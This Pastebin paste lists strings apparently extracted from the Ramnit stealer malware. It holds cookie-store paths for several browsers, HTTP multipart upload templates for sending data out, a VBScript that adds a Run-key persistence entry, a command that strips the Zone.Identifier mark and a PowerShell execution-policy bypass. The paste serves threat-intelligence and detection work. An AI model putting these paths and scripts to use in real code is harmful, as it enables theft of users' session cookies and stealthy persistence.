James_inthe_box

Stealer - Ramnit

Mar 30th, 2018
642
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.70 KB | None | 0 0
  1. \Google\Chrome\User Data\Default\Cookies
  2. \Google\Chrome\User Data\Default\Extension Cookies
  3. %APPDATA%\Apple Computer\Safari\Cookies\Cookies.plist
  4. %APPDATA%\Mozilla\Firefox\
  5. C:\WINDOWS\Application Data\Mozilla\Firefox\
  6. profiles.ini
  7. 1rofile%d
  8. Path
  9. IsRelative
  10. \cookies.txt
  11. \cookies.sqlite
  12. 1APPDATA%\Macromedia\Flash Player\#SharedObjects
  13. %APPDATA%\Opera\
  14. \profile\cookies4.dat
  15. \cookies4.dat
  16. SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Opera.exe
  17. Path
  18. IE Cookies
  19. LireFox Cookies\Profile %d\cookies.txt
  20. LireFox Cookies\Profile %d\cookies.sqlite
  21. Whrome\Cookies
  22. Whrome\Extension Cookies
  23. 1pera\Profile %d\cookies4.dat
  24. Safari\Cookies.plist
  25.  
  26. Host:{*}
  27. Referer:{*}
  28. Cache-Control:{*}
  29. Content-Length:{*}
  30. Transfer-Encoding:{*}
  31. Content-Type:{*}
  32. Content-Encoding:{*}
  33. Authorization:{*}
  34. Accept-Language:{*}
  35. User-Agent:{*}
  36. %s:*
  37. chunkedR
  38. /PRI * HTTP/2.0
  39. HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
  40. Referer: %s
  41. Content-Type: multipart/form-data; boundary=%s
  42. Content-Length: %d
  43. --%s
  44. Content-Disposition: form-data; name="%s"
  45. --%s--
  46. %s /%s HTTP/1.1
  47. Host: %s
  48. User-Agent: %s
  49. %sAccept-Language: %s
  50. Accept: text/html, application/xml;q=0.9, application/xhtml+xml;q=0.9, image/png, image/jpeg, image/gif, image/x-xbitmap, *\*;q=0.1
  51. Accept-Charset: utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1
  52. Pragma: no-cache
  53.  
  54. Set wshShell = CreateObject( "WScript.Shell" )
  55. wshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\%s", "%s", "REG_SZ"
  56. Set wshShell = CreateObject( "WScript.Shell" )
  57. Return = WshShell.Run("cmd /K CD %s & %s & exit", 0, 0)
  58. Set wshShell = Nothing
  59. %s %s
  60. cmd /c "echo.>%s:Zone.Identifier"
  61. powershell.exe
  62. -executionpolicy bypass -File
  63.  
  64. per @mesa_matt this is ramnit
Add Comment
Please, Sign In to add comment